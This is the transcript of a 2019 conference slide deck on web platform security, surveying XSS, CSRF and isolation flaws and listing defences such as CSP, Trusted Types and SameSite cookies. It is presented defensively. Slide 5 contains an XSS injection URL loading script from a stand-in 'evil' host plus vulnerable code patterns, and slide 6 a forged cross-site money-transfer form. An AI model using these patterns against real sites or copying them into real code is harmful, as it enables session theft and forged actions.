Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web Platform Security @ TechDays 2019

3c27881a0d8695811b0fa23bd794e696?s=47 Mike West
PRO
June 03, 2019
Programming
1
89

Web Platform Security @ TechDays 2019

Web Platform Security.

3c27881a0d8695811b0fa23bd794e696?s=128

Mike West
PRO

June 03, 2019
Tweet

More Decks by Mike West

See All by Mike West
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
PRO
0
690
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
PRO
0
120
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
PRO
0
1.2k
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
PRO
0
320
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
PRO
0
57
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
PRO
2
560
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
PRO
0
230
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
PRO
5
1.3k
3c27881a0d8695811b0fa23bd794e696?s=48 mikewest
PRO
2
960

Other Decks in Programming

See All in Programming
7c9b8b368924556d8642bdaed3ded1f5?s=48 danilop
1
550
F0012066f4fad79deb33bf5e9799b557?s=48 francescostrazzullo
0
110
B311713ff6de02a7b88c2e9f63d2ea45?s=48 mcavaliere
0
190
Be33a704f251c77162896ac5ba03e9ac?s=48 azuki
0
210
098ad475722e3697ec2fba28c8654f9f?s=48 yuhta28
0
520
Dd5ce24e9cc88d7a491aec105e558d7e?s=48 bateleurx
10
8.4k
C3a47a823a1e7adcb5be27cc3df5c482?s=48 akiyoko
3
900
Bf71b646607bbe6916ccefc6548ebedd?s=48 lyakaap
0
300
347b7e6efc62b633d37a5d0a8d62ae86?s=48 junghyeonjae
0
180
3cfad86677c5966ecfe9b81955fa3489?s=48 inoue2002
0
320
A5e5ee2fb9e4ce3c728ed9e3ef6e916f?s=48 joker1007
10
1.8k
6bf08ada80199f23061a6c22f03f0ed2?s=48 masahiro_nishimi
0
480

Featured

See All Featured
3d4519fd34b76fb265fc0237f3792bd4?s=48 danielanewman
6
700
4394ceb8b277f35ee3da7030384efb5d?s=48 davidbonilla
75
3.7k
D47656e20ff5e42f125fc5ea0fd636c6?s=48 tmm1
64
10k
1177e050db6bafe62885362edf6e3537?s=48 lauravandoore
443
29k
E190023b66e2b8aa73a842b106920c93?s=48 zenorocha
300
40k
D09fad3e36ae6841f54820be0e907f7a?s=48 rocio
156
12k
766b9746b59e6f09e280cd33cf4ed419?s=48 skipperchong
13
920
A9179349dd2bdc67f377719f56d85656?s=48 garrettdimon
291
110k
3ab1249be442027903e1180025340b3f?s=48 reverentgeek
33
2.3k
1b8ad785acdd1ce1c99914b1c2a4e10e?s=48 sugarenia
235
930k
245cee81a9c424266e5e401d844ea881?s=48 lara
26
3.2k
812e1705ff0f8bc1bcf18587bde687d5?s=48 62gerente
591
210k

Transcript

  1. Web Platform Security Mike West, Google Chrome @mikewest mkwst@google.com http://bit.ly/wps_techdays_2019

  2. None
  3. None

  4. Google Vulnerability Reward Program (VRP) payouts in 2018 XSS 35.6%

    CSRF 3.2% Clickjacking 4.2% Other web bugs 7.8% Non-web issues 49.1% Mobile app vulnerabilities Business logic (authorization) Server /network misconfigurations ...

  5. Injections <?php echo $_GET["query"] ?> foo.innerHTML = location.hash.slice(1) 1. Logged

    in user visits attacker's page 2. Attacker navigates user to a vulnerable URL 3. Script runs, attacker gets access to user's session … and many other patterns Bugs: Cross-site scripting (XSS) https://victim.example/?query=<script src="//evil/">

  6. Insufficient isolation 1. Logged in user visits attacker's page 2.

    Attacker sends cross-origin request to vulnerable URL 3. Attacker takes action on behalf of user, or infers information about the user's data in the vulnerable app. Bugs: Cross-site request forgery (CSRF), XS-leaks, timing, ... <form action="/transferMoney"> <input name="recipient" value="Lukas" /> <input name="amount" value="10" /> <form action="//victim.example/transferMoney"> <input name="recipient" value="Attacker" /> <input name="amount" value="∞" />

  7. Insufficient isolation New classes of flaws related to insufficient isolation

    on the web: - Microarchitectural issues (Spectre / Meltdown) - Advanced web APIs used by attackers - Improved exploitation techniques The number and severity of these flaws is growing.

  8. Collaborate in standards bodies

  9. https://w3c.github.io/webappsec-csp/ https://csp.withgoogle.com/

  10. https://wicg.github.io/trusted-types

  11. https://tools.ietf.org/html/draft-ietf-httpbis-rfc6265bis https://web.dev/samesite-cookies-explained/

  12. https://w3c.github.io/webappsec-fetch-metadata

  13. https://github.com/whatwg/html/issues/3740

  14. https://github.com/whatwg/fetch/issues/687

  15. https://www.arturjanc.com/cross-origin-infoleaks.pdf

  16. Thanks! Mike West, Google Chrome @mikewest mkwst@google.com http://bit.ly/wps_techdays_2019